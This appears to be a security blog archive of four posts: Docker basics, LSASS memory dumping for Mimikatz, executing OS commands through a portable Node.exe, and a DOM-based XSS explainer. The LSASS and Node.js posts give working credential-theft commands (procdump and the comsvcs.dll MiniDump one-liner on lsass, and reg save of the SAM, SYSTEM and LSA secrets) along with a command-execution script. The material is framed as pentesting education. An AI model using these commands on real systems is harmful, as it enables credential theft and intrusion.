Saturday, 18 April 2020

Dockers and Containers


For years, developer had a challenge setting up development environment with the right configurations of tools as well as time required for the same.

This becomes even more complex when developer is using diverse technology stack. Consider a scenario where developer has written code in Python to accept the web requests using Mongo DB as back-end and further using analytics application to generate report.

Now as you can see diverse technology stack comes into picture here, is it easy task to setup all these stacks and connect with each others? Not at all. That's where docker technology comes into picture.

Above problem for installing the required technology tools/stack becomes very handy just with few commands! Rest you rely on the docker to take care of back-end dependencies.


  1. docker run  --name=db -d mongo   (This will install complete running Mongo DB for you )
  2. docker run --name=db -d MySQL  (This will install complete running MySQL DB for you )
  3. docker run  --name=db -d nginix   (This will install complete running NGINX for you )
Its that easy! Of course we can mention additional configurations by parameters, you can refer respective docker documentation for the same.



By Default when container is started, IP address is allocated within the sub net range defined for bridge network.

First we can list the interfaces as mentioned below : 

docker network ls









For viewing the details of default IP range configured we can use following command,

docker network inspect bridge
















Now we know the default range allocated for container. We can list the IP address of running container by executing following command

docker container inspect --format '{{ .NetworkSettings.IPAddress }}' <container name>








List docker container processes running on system along with their details

docker ps






Monday, 13 April 2020

LSASS Dumping Methods ( For Mimikatz )


In every attack we need to get the windows credentials, this super important task. We need to target "LSASS.EXE" process and dump the process memory so that we can use it for extracting credentials using Mimikatz.


Here are some of the important methods,

Using ProcDump :

1. Favorite method of dumping is using "procdump.exe". This tool is from Microsoft Pstools
2. Download ProcDump.exe and upload in on remote system
3. Command : "procdump -ma lsass.exe lsass.dmp"


Using VB Script :

Download script from here :
https://drive.google.com/open?id=1jwy40ykrdEHWB1sddZ-Q5USDX9OOPOPp













rundll32 Command :

Essentially previous method VBS script is using following command for dumping Lsass.exe process

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 992 C:\Users\Public\lsass.bin full

So in case you do not have VB Script with you still you can fire-up the command and dump LSASS process.

















Wednesday, 1 April 2020

Executing Commands via Node.js ( Portable Node.exe )


Was exploring Node.js and thought to publish article here on how we can leverage Node.js in pentesting.

I saw few articles of Malware's targeting some of the organizations in USA and UK are using Node.js in their attacks. Seems its really interesting idea to explore how we can leverage this in our Red Teams!

Quick Introduction on Node.js

1. Its an open source JavaScript run time environment
2. In a simple words, its a server side JavaScript programming language
3. Node.js gives you access to its API which can control system.


Similar to other programming languages, you can Create, Read, Modify files, access OS etc.

For complete list of API refer - https://nodejs.org/docs/latest-v13.x/api/


1. Install Node.js on windows
2. Post installation you can access it with 'node' command
3. In Node console we can execute node commands












Now for Pen-testers, we don't have to install Node.js on remote system we can always carry portable node.exe file and drop it in remote system. ( I don't have to tell you where to get Node.exe, You can figure out yourself! )


Here is the code which we can use for executing OS commands via Node.js API.

var myArgs = process.argv.slice(2);

const { exec } = require("child_process");

exec(myArgs, (error, stdout, stderr) => {
    if (error) {
        console.log(`error: ${error.message}`);
        return;
    }
    if (stderr) {
        console.log(`stderr: ${stderr}`);
        return;
    }

     
    console.log(`stdout: ${stdout}`);
});


Executing OS commands via Node.js





















Now we can pass on following important commands as well,

1. node.exe file.js "reg save HKLM\SAM c:\SAM"
2. node.exe file.js "reg save HKLM\SYSTEM c:\SYSTEM"
3. node.exe file.js "HKEY_LOCAL_MACHINE\Security\Policy\Secrets c:\lsa"


This is just one way of executing OS commands via portable Node.exe

Lot more things can be done with this, even a simple Command and control code which will call back your web server and fetch commands or Web server using nodejs which we can use for accessing victim files!


There were instances of Malware's codes containing hard coded nodejs links for downloading Node.exe
https://nodejs.org/dist/latest-v10.x/win-x86/


Here is the good article on Malware's using Node.js :
https://isc.sans.edu/forums/diary/Malware+Dropping+a+Local+Nodejs+Instance/25284/




Document Object Model and DOM XSS


DOM (Document Object Model)

How many times you saw applications in past where even if you click on some of the buttons or select items from List box and complete page is refreshed. Basically at each such event execution requests is being initiated to server and server responds with complete HTML code to client browser.

Is not this tedious? Why to load complete HTML page with thousands of tags for each request. Instead what if there is a way where we can only update specific TAG within the HTML code without loading the whole page?

In this case, we can give control to JavaScript being executed at client browser to change/modify/update  data within specific TAG's within HTML. So other TAG and data in the page remains same without any refresh. This will be in a way faster !

By manipulating the DOM,
1. You can create applications that update the data of the page without needing a refresh.
2. You can create applications that are customizable by the user and then change the layout of the page without a refresh.


Key Points in DOM,
1. Page loaded in the application contains thousands of HTML TAGS consider these are all Object.
2. Browser creates the hierarchical view of the TAGS so that JavaScript at client side can actually query specific TAG, extract TAG data, Change/Modify/Update the data within the TAGS as required by application or user.


Example :

Website which loads the flight tickets, you can select the source and destination and click on search, post which request sent to server for retrieving price.

Once price is retrieved by JavaScript, it can query for specific TAG in the application where price data needs to be updated. Using DOM methods JavaScript can change/update/modify data in specific TAG and now you see the price in front of you!



For key methods in DOM Refer : https://www.w3schools.com/js/js_htmldom_document.asp


Querying the Tags using DOM Methods 












DOM Based XSS Attack :

Diagram of a DOM-based XSS attack
Reference : excess-xss.com


Summary :
1. Attacker Crafts URL with XSS payload
2. Sends the link to Victim
3. Victim executes link
4. Request sent to Server
5. Using DOM method - document.queryselector content from parameter "keyword" are getting updated in the page without appropriate validation.

Before updating the response using queryselector there should be appropriate validation of the string being passed.


References :

https://hackerone.com/reports/324303

https://hackerone.com/reports/398054

https://www.freecodecamp.org/news/whats-the-document-object-model-and-why-you-should-know-how-to-use-it-1a2d0bc5429d/

https://www.researchgate.net/figure/DOM-XSS-attack-exploitation_fig4_317560469

https://excess-xss.com/

https://www.w3schools.com/js/js_htmldom_document.asp